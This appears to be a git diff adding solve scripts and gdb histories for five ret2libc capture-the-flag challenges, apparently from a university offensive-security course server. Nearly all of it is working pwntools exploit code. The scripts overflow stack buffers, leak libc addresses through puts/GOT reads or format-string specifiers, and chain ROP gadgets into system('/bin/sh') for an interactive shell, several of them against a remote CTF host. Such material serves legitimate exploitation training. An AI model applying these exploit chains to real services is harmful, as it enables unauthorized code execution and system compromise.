Second CTFs part

ret2libc/01_neon_diner/solve.py

@@ -0,0 +1,25 @@
+from pwn import *
+
+context.binary = elf = ELF('./ret2plt', checksec=False)
+
+OFFSET_TO_RIP = 72
+
+#p = process(elf.path)
+p = remote("offsec.m0lecon.it", 13501)
+
+pop_rdi = elf.sym.pop_rdi_ret
+binsh = next(elf.search(b'/bin/sh\x00'))
+ret = ROP(elf).find_gadget(['ret']).address
+
+payload = flat(
+    b'A'*OFFSET_TO_RIP,
+    p64(ret),
+    p64(pop_rdi),
+    p64(binsh),
+    p64(elf.plt.system),
+)
+
+p.recvuntil(b'order?\n')
+p.send(payload)
+p.interactive()
+

ret2libc/02_dusty_scrolls/.gdb_history

@@ -0,0 +1,13 @@
+r
+r
+quit
+p puts
+start
+p puts
+quit
+disass vuln
+b *0x0000000000401215
+c
+r
+got
+quit

ret2libc/02_dusty_scrolls/solve.py

@@ -0,0 +1,51 @@
+#!/usr/bin/env python3
+from pwn import *
+
+context.binary = elf = ELF("./ret2libc_leak", checksec=False)
+# Change if on server
+
+libc = ELF("libc.so.6", checksec=False)
+# This version of libc has put that ends with 0x00 so it's unprintable in local
+# libc = ELF("/usr/lib/libc.so.6", checksec=False)
+OFFSET_TO_RIP = 72
+POP_RDI = 0x4011DB
+RET = 0x40101A
+PUTS_PLT = 0x401060
+# PUTS_PLT = elf.plt['puts']
+PUTS_GOT = elf.got["puts"]
+MAIN = 0x401227
+# MAIN = elf.sym['main']
+
+BINSH = next(elf.search(b"/bin/sh\x00"))
+p = process(elf.path)
+# p = remote("offsec.m0lecon.it", 13507)
+# -------- Stage 1: leak puts --------
+p.recvuntil(b"looking for?\n")
+stage1 = flat(
+    b"A" * OFFSET_TO_RIP,
+    p64(POP_RDI),
+    p64(BINSH),
+    # p64(PUTS_GOT),
+    p64(PUTS_PLT),
+    p64(MAIN),
+)
+p.send(stage1)
+p.recvline()  # consume "Let me check..."
+leaked = p.recvline().strip()
+leak_puts = u64(leaked.ljust(8, b"\x00"))
+log.info(f"puts leak = {leak_puts:#x}")
+libc.address = leak_puts - libc.symbols["puts"]
+log.info(f"libc base = {libc.address:#x}")
+# -------- Stage 2: system("/bin/sh") --------
+system_addr = libc.symbols["system"]
+p.recvuntil(b"looking for?\n")
+stage2 = flat(
+    b"A" * OFFSET_TO_RIP,
+    p64(RET),
+    p64(POP_RDI),
+    p64(0x402008),  # addr /bin/sh
+    p64(libc.symbols["system"]),  # address of system
+)
+p.send(stage2)
+p.interactive()
+# p.recvline()

ret2libc/02_dusty_scrolls/test.py

@@ -0,0 +1,54 @@
+#!/usr/bin/env python3
+from pwn import *
+
+context.binary = elf = ELF("./ret2libc_leak", checksec=False)
+# Change if on server
+
+# libc = ELF("libc.so.6", checksec=False)
+# This version of libc has put that ends with 0x00 so it's unprintable in local
+libc = ELF("/usr/lib/libc.so.6", checksec=False)
+OFFSET_TO_RIP = 72
+POP_RDI = 0x4011DB
+RET = 0x40101A
+PUTS_PLT = 0x401060
+# PUTS_PLT = elf.plt['puts']
+# PUTS_GOT = elf.got["puts"]
+PUTS_GOT = elf.got["read"]
+MAIN = 0x401227
+# MAIN = elf.sym['main']
+
+BINSH = next(elf.search(b"What book are you looking for?\x00"))
+# BINSH = next(elf.search(b"/bin/sh\x00"))
+p = process(elf.path)
+# p = remote("offsec.m0lecon.it", 13507)
+# -------- Stage 1: leak puts --------
+p.recvuntil(b"looking for?\n")
+stage1 = flat(
+    b"A" * OFFSET_TO_RIP,
+    p64(POP_RDI),
+    p64(PUTS_GOT),
+    p64(PUTS_PLT),
+    p64(MAIN),
+)
+p.send(stage1)
+p.recvline()  # consume "Let me check..."
+# print(p.recvline())
+leaked = p.recvline().strip()
+leak_puts = u64(leaked.ljust(8, b"\x00"))
+log.info(f"puts leak = {leak_puts:#x}")
+libc.address = leak_puts - libc.symbols["puts"]
+log.info(f"libc base = {libc.address:#x}")
+# -------- Stage 2: system("/bin/sh") --------
+"""
+system_addr = libc.symbols["system"]
+p.recvuntil(b"looking for?\n")
+stage2 = flat(
+    b"A" * OFFSET_TO_RIP,
+    p64(RET),
+    p64(POP_RDI),
+    p64(0x402008),  # addr /bin/sh
+    p64(libc.symbols["system"]),  # address of system
+)
+p.send(stage2)
+p.interactive()
+# p.recvline()"""

ret2libc/03_feedback_portarl/.gdb_history

@@ -0,0 +1,109 @@
+r
+r
+quit
+r
+quit
+ls
+disass main
+disass setup
+disass vuln
+b vuln
+r
+quit
+disass vuln
+b vuln
+r
+c
+r
+c
+r
+c
+r
+c
+r
+c
+r
+r
+c
+r
+c
+p $sp
+p $rsp
+r
+p $sp
+p $sp+1
+p $sp+8
+r
+r
+r
+quit
+b vuln
+r
+p $sp
+p $sp+8
+p $sp
+p x/10x $sp
+x/10x $sp
+x/20x $sp
+disass main
+disass vuln
+disass setup
+disass vuln
+r
+r
+c
+r
+c
+r
+c
+r
+c
+finish
+9$lx
+finish
+finish
+n
+r
+c
+xinfo 7ffff7e0a4a0
+xinfo 0x7ffff7e0a4a0
+stack
+x/10i 0x7ffff7e0a4a0
+r
+c
+r
+%9$lx
+c
+stack
+quit
+b vuln
+r
+%9$lx
+c
+r
+%20$lx.%21$lx.%22$lx.%23$lx.%24%lx
+c
+r
+c
+r
+
+r
+r
+r
+r
+r
+b vuln
+r
+stack
+disass main
+r
+c
+r
+
+r
+c
+r
+r
+c
+r
+c

ret2libc/03_feedback_portarl/find_ret.py

@@ -0,0 +1,2 @@
+for i in range(45,55):
+    print(f"%{i}$lx.", end="")

ret2libc/03_feedback_portarl/solve.py

@@ -0,0 +1,49 @@
+#!/usr/bin/env python3
+from pwn import *
+context.binary = elf = ELF('./feedback_portal', checksec=False)
+# Change if on server
+
+libc = ELF('libc.so.6', checksec=False)
+#libc = ELF('/usr/lib/libc.so.6', checksec=False)
+OFFSET_TO_RIP = 128 + 8
+RET = 0x40101a
+#libc_call = libc.sym['__libc_start_main']
+libc_call = 0x29d90
+# local libc
+#POP_RDI = 0x10269a
+# remote libc
+POP_RDI = 0x10f78b
+BINSH = next(libc.search(b'/bin/sh\x00'))
+
+#p = process(elf.path)
+p = remote("offsec.m0lecon.it", 13595)
+
+p.recvuntil(b'Please enter your name:\n')
+# __libc_start_main (non funziona in remoto)
+#p.sendline(b"%47$lx")
+# __libc_start_call_main
+p.sendline(b"%25$lx")
+
+libc_start_main = p.recvline().split(b',')[1].strip()
+libc_start_main = b'0x' + libc_start_main
+libc_start_main = int(libc_start_main, 16)
+
+#libc_address = libc_start_main - libc_call - 128 - 8
+print(f"Libc start main dropped:{hex(libc_start_main)}")
+print(f"Libc start main from symbol:{hex(libc_call)}")
+print(f"BINSH:{hex(BINSH)}")
+libc_address = (libc_start_main - libc_call) & ~0xfff
+print(f"Addr: {hex(libc_address)}")
+libc.address = libc_address
+print(p.recvuntil(b'Now leave your feedback:\n'))
+payload = flat(
+        b'A' * OFFSET_TO_RIP,
+        p64(RET),
+        #elf.symbols["main"],
+        p64(libc_address + POP_RDI),
+        p64(libc_address + BINSH),
+        libc.symbols["system"]
+        )
+p.send(payload)
+#print(p.recvline())
+p.interactive()

ret2libc/04_crystal_ball/.gdb_history

@@ -0,0 +1,20 @@
+disass vuln
+disass main
+r
+disass main
+got
+python
+clear
+quit
+quit
+p rdx
+info registers
+quit
+disass vuln
+b *0x000000000040124e
+info regs
+info registers 
+c
+quit
+dquit
+quit

ret2libc/04_crystal_ball/solve.py

@@ -0,0 +1,59 @@
+from pwn import *
+
+RIP_OFF = 64 + 8
+context.binary = elf = ELF("./ret2libc_aslr", checksec=False)
+# context.gdbinit = "/usr/local/"
+# Change if on server
+libc = ELF("libc.so.6", checksec=False)
+# libc = ELF("/usr/lib/libc.so.6", checksec=False)
+POP_RDI = 0x4011FB
+RET = 0x40101A
+PUTS_PLT = elf.plt["puts"]
+PUTS_GOT = elf.got[
+    "gets"
+]  # my libc puts end with x00 so it's better to use anything else in the binary
+MAIN = elf.sym["main"]
+BINSH = next(libc.search(b"/bin/sh\x00"))
+context.terminal = ["tmux", "splitw", "-h"]
+
+# p = process(elf.path)
+p = remote("offsec.m0lecon.it", 13505)
+
+print(p.recvuntil(b"Tell me your wish:"))
+# p.recvuntil(b"The stars have spoken!\n")
+# pause()
+payload = flat(
+    b"A" * RIP_OFF, p64(RET), p64(POP_RDI), p64(PUTS_GOT), p64(PUTS_PLT), p64(MAIN)
+)
+# print("Sending payload...")
+# sendline for gets function
+p.sendline(payload)
+p.recvline()
+leaked = p.recvline().strip()
+leak_puts = u64(leaked.ljust(8, b"\x00"))
+log.info(f"puts leak = {leak_puts:#x}")
+libc.address = leak_puts - libc.symbols["gets"]
+log.info(f"libc base = {libc.address:#x}")
+print(p.recvline())
+print(p.recvline())
+print(p.recvuntil(b"Tell me your wish:"))
+# p.send(b"\n")
+# print(p.recv(1024))
+# print(p.recv(128))
+# print(p.recv(128))
+# print(p.recvline())
+# print(p.recvline())
+# print(p.recvuntil(b"Tell me your wish:"))
+
+payload = flat(
+    b"A" * RIP_OFF, p64(POP_RDI), p64(libc.address + BINSH), p64(libc.symbols["system"])
+)
+p.sendline(payload)
+print(p.recvline())
+p.interactive()
+# print(p.recv(1024))
+# print(p.recv(1024))
+
+# p.recvuntil(b"Tell me your wish:")
+# p.interactive()
+# p = remote("offsec.m0lecon.it", 13507)

ret2libc/05_digital_postcard_writer/.gdb_history

@@ -0,0 +1,7 @@
+r
+quit
+disass vuln
+b *0x0000000000401258
+r
+got
+quit

ret2libc/05_digital_postcard_writer/main.c

@@ -0,0 +1,5 @@
+#include <stdio.h>
+int main(){
+    printf(0x334455);
+    return 0;
+}

ret2libc/05_digital_postcard_writer/solve.py

@@ -0,0 +1,49 @@
+from pwn import *
+
+context.binary = elf = ELF("./ret2libc_home", checksec=False)
+# Change if on server
+libc = ELF("libc.so.6", checksec=False)
+# libc = ELF("/usr/lib/libc.so.6", checksec=False)
+POP_RDI = 0x4011FB
+RIP_OFF = 128 + 8
+# I can still use puts instead of printf since puts is used inside the main
+PRINTF_PLT = elf.plt["printf"]
+PUTS_PLT = elf.plt["puts"]
+PRINTF_GOT = elf.got[
+    "puts"
+]  # In local I can use printf, instead on remote I switch to puts (printf end with \x00
+MAIN = elf.symbols["main"]
+
+BINSH = next(libc.search(b"/bin/sh\x00"))
+RET = 0x40101A
+# STR = next(elf.search(b"Write your message:\n\x00"))
+# p = process(elf.path)
+p = remote("offsec.m0lecon.it", 13597)
+print(p.recvuntil(b"Write your message:\n"))
+payload = flat(
+    b"A" * RIP_OFF,
+    p64(RET),
+    p64(POP_RDI),
+    # p64(STR),
+    p64(PRINTF_GOT),
+    p64(PUTS_PLT),
+    # p64(PRINTF_PLT),
+    p64(MAIN),
+)
+p.send(payload)
+print(p.recvline())
+# print(p.recvline())
+leaked = p.recvline().strip()
+leak_puts = u64(leaked.ljust(8, b"\x00"))
+log.info(f"puts leak = {leak_puts:#x}")
+libc.address = leak_puts - libc.symbols["puts"]
+log.info(f"libc base = {libc.address:#x}")
+
+
+print(p.recvuntil(b"Write your message:\n"))
+
+payload = flat(
+    b"A" * RIP_OFF, p64(POP_RDI), p64(libc.address + BINSH), p64(libc.symbols["system"])
+)
+p.send(payload)
+p.interactive()